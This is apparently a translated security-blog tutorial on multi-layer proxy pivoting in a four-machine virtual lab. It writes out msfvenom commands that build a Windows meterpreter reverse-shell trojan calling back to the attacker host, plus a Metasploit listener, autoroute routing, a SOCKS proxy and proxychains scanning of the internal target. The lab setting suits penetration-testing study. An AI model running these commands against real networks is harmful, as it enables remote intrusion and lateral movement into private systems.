Forward multi-layer proxy (internal network penetration)

0 21
Some prefixes are prepared1. We need four virtual machines --- win10 (as the loc...

Some prefixes are prepared

1. We need four virtual machines --- win10 (as the local host), kali (as the vps), win7 (as the jump box), win2012 (as the target machine)

2. We need to simulate an internal network host and configure the virtual machine network card to prevent it from going online

Forward multi-layer proxy (internal network penetration)

Edit --> Virtual Network Editor --> Add Network

1667964113_636b1cd136ec2268cceba.png!small?1667964112986

DHCP settings

The range here is arbitrary

1667964118_636b1cd636dee90332936.png!small?1667964118036

3. All hosts use NAT mode

4. The jump box requires two network cards (one for outgoing network (NAT), one for the internal network (12.12.12.0 subnet))
1667965352_636b21a8e976e0ad91c94.png!small?16679653528725. The target machine needs to open an http service using the Xiao Pi panel

1667965035_636b206bf387c1ae4353d.png!small?1667965035913

Set up a tunnel proxy

win7 acts as a proxy, accessing kali's own 1080 port is equivalent to having win7 access the target machine's 80 port for us


  1. kali generates a trojan for connecting to the jump box win7

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.250.129 LPORT=7777 -f exe > kali.exe

  2. kali opens a listener

    msfconsole
    set payload windows/meterpreter/reverse_tcp 
    set lhost eth0
    set lport 7777
    run

    1667970104_636b3438d33ad92143178.png!small?1667970104796

  3. Trojan上线

    Place the trojan in win7 to run

  4. Configure the routing of win7

    Ensure that win7 can communicate with win2012

    run autoroute -p
    run autoroute -s 12.12.12.0/24
    run autoroute -p 
    bg
    route print

  5. kali opens a tunnel

    use auxiliary/server/socks_proxy
    set version 4a
    run

    vim /etc/proxychains4.conf
    socks4 192.168.250.129 1080

  6. kali accesses the target machine

    proxychains nmap -sT 12.12.12.18 -p 80   or
    proxychains firefox 12.12.12.18

If the browser cannot access, it is enough to detect that port 80 is open

Access the target host through win10

  1. Enable global proxy to direct all traffic to the Kali machine

    Download SocksCap (download the exe file only)

    https://github.com/bobo2334/sockscap64/releases

    Select No during installation

    Run exe
    1667970677_636b36755b26d2eaa5ae3.png!small?1667970677325
    1667970591_636b361f04407b33b118f.png!small1667970649_636b3659db538ccf4c857.png!small?16679706498491667970739_636b36b343ff2c09b0b46.png!small?16679707391471667970752_636b36c0660dc7bfba0ce.png!small?16679707524511667970769_636b36d16b9307395dbc0.png!small?1667970769340

  2. Locally use burp to capture packets

Packet Capture Configuration
1667970863_636b372fe7602ae2b2a14.png!small?1667970863950

Completed

1667971022_636b37ce37b4d8f4b9e98.png!small?1667971022132


你可能想看:

Internal and external cultivation | Under the high-confrontation offensive and defensive, internal network security cannot be ignored

4.5 Main person in charge reviews the simulation results, sorts out the separated simulation issues, and allows the red and blue teams to improve as soon as possible. The main issues are as follows

Looking forwards- Two experts predict the next 5 years in cyber

GPT-3: in-context learning + few-shot learning, 175 billion parameters, 96 layers, 500 billion words

d) Adopt identification technologies such as passwords, password technologies, biometric technologies, and combinations of two or more to identify users, and at least one identification technology sho

2. The International Criminal Police Organization arrests more than 1,000 network criminals from 20 countries, seize 27 million US dollars

Frontend and backend configurations for SSL/TLS termination in HAProxy

As announced today, Glupteba is a multi-component botnet targeting Windows computers. Google has taken action to disrupt the operation of Glupteba, and we believe this action will have a significant i

Introduction to Internet of Things Terminal Security and Practice - Playing with Internet of Things Firmware (Part 2) DIY article

2. Use ShardingSphere-Proxy to implement sensitive data encryption

最后修改时间:
admin

本文仅代表作者观点,不代表平台立场

内容由 admin 发布,转载请注明内容出处

上一篇 2025年03月29日 02:55
下一篇 2025年03月29日 03:17

评论已关闭